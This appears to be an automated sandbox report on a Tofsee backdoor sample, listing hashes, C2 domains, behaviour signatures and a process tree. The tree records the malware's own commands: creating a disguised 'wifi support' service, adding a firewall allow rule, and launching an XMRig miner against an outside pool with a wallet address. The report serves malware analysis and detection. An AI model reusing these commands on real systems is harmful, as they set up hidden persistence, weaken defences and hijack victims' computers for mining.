Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2022 05:16

General

  • Target

    4cfad436d1866ac61fdb1160fd919fe085501a6de79905f02386ca2c0f5a140d.exe

  • Size

    139KB

  • MD5

    31b3db0de54d12c49384f075e24727a6

  • SHA1

    f7b425de24096d94a6750d9b05b2520545edac8d

  • SHA256

    4cfad436d1866ac61fdb1160fd919fe085501a6de79905f02386ca2c0f5a140d

  • SHA512

    8c2421dd0df0aeb64bed6558bb12e8ad1d1b3e740fa8b1075606d3e44ff9deffcae6a4cf9e641fc3c54e41c7ba120548e9b88bc6e693eb68aa1a71f64ba3982d

  • SSDEEP

    1536:jpu4fjLe0nWZu9YCMmMr5LUI695e2d0dnmup7NIjw9zUyUgCLnyZmqaWpAIYKaA5:tTfznEr5Av9bcn9Kw9zUySLinaWrYho

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4cfad436d1866ac61fdb1160fd919fe085501a6de79905f02386ca2c0f5a140d.exe
    "C:\Users\Admin\AppData\Local\Temp\4cfad436d1866ac61fdb1160fd919fe085501a6de79905f02386ca2c0f5a140d.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4984
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\umpgypds\
      2⤵
        PID:1208
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zoczsyux.exe" C:\Windows\SysWOW64\umpgypds\
        2⤵
          PID:3656
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create umpgypds binPath= "C:\Windows\SysWOW64\umpgypds\zoczsyux.exe /d\"C:\Users\Admin\AppData\Local\Temp\4cfad436d1866ac61fdb1160fd919fe085501a6de79905f02386ca2c0f5a140d.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1468
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description umpgypds "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:800
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start umpgypds
          2⤵
          • Launches sc.exe
          PID:1864
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4584
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 1040
          2⤵
          • Program crash
          PID:4452
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4984 -ip 4984
        1⤵
          PID:4056
        • C:\Windows\SysWOW64\umpgypds\zoczsyux.exe
          C:\Windows\SysWOW64\umpgypds\zoczsyux.exe /d"C:\Users\Admin\AppData\Local\Temp\4cfad436d1866ac61fdb1160fd919fe085501a6de79905f02386ca2c0f5a140d.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:5036
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:4812
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 536
            2⤵
            • Program crash
            PID:4532
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5036 -ip 5036
          1⤵
            PID:4632

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\zoczsyux.exe
            Filesize

            12.3MB

            MD5

            cd2758131549f5e2d14a00f712c2bd65

            SHA1

            74aa263b3819caa8055f446a9152e90edd0cee1e

            SHA256

            27590fd7639d1213f8accb437c02d23c0c7af2a8c92860e7eeff65dd76158d2b

            SHA512

            1943bc031d9efa065d7ad8bfa9254a24d784c228f68e869d2e2e62782c1a3294cb3d0a709a72b5976afb352aea43081c8e6546eebd9a9e836e0e534cc0d7855b

          • C:\Windows\SysWOW64\umpgypds\zoczsyux.exe
            Filesize

            12.3MB

            MD5

            cd2758131549f5e2d14a00f712c2bd65

            SHA1

            74aa263b3819caa8055f446a9152e90edd0cee1e

            SHA256

            27590fd7639d1213f8accb437c02d23c0c7af2a8c92860e7eeff65dd76158d2b

            SHA512

            1943bc031d9efa065d7ad8bfa9254a24d784c228f68e869d2e2e62782c1a3294cb3d0a709a72b5976afb352aea43081c8e6546eebd9a9e836e0e534cc0d7855b

          • memory/800-139-0x0000000000000000-mapping.dmp
          • memory/1208-135-0x0000000000000000-mapping.dmp
          • memory/1468-138-0x0000000000000000-mapping.dmp
          • memory/1864-140-0x0000000000000000-mapping.dmp
          • memory/1996-173-0x0000000000870000-0x0000000000961000-memory.dmp
            Filesize

            964KB

          • memory/1996-178-0x0000000000870000-0x0000000000961000-memory.dmp
            Filesize

            964KB

          • memory/1996-172-0x0000000000000000-mapping.dmp
          • memory/3656-136-0x0000000000000000-mapping.dmp
          • memory/4584-141-0x0000000000000000-mapping.dmp
          • memory/4812-145-0x0000000000000000-mapping.dmp
          • memory/4812-166-0x0000000007880000-0x0000000007C8B000-memory.dmp
            Filesize

            4.0MB

          • memory/4812-146-0x0000000000CC0000-0x0000000000CD5000-memory.dmp
            Filesize

            84KB

          • memory/4812-169-0x00000000021F0000-0x00000000021F7000-memory.dmp
            Filesize

            28KB

          • memory/4812-163-0x00000000021E0000-0x00000000021E5000-memory.dmp
            Filesize

            20KB

          • memory/4812-160-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/4812-157-0x00000000011E0000-0x00000000011E6000-memory.dmp
            Filesize

            24KB

          • memory/4812-152-0x0000000000CC0000-0x0000000000CD5000-memory.dmp
            Filesize

            84KB

          • memory/4812-153-0x0000000000CC0000-0x0000000000CD5000-memory.dmp
            Filesize

            84KB

          • memory/4812-154-0x0000000002A00000-0x0000000002C0F000-memory.dmp
            Filesize

            2.1MB

          • memory/4984-149-0x0000000000400000-0x0000000000459000-memory.dmp
            Filesize

            356KB

          • memory/4984-144-0x00000000006C0000-0x00000000006D3000-memory.dmp
            Filesize

            76KB

          • memory/4984-132-0x000000000077D000-0x000000000078E000-memory.dmp
            Filesize

            68KB

          • memory/4984-143-0x000000000077D000-0x000000000078E000-memory.dmp
            Filesize

            68KB

          • memory/4984-134-0x0000000000400000-0x0000000000459000-memory.dmp
            Filesize

            356KB

          • memory/4984-133-0x00000000006C0000-0x00000000006D3000-memory.dmp
            Filesize

            76KB

          • memory/5036-151-0x0000000000400000-0x0000000000459000-memory.dmp
            Filesize

            356KB

          • memory/5036-150-0x0000000000799000-0x00000000007A9000-memory.dmp
            Filesize

            64KB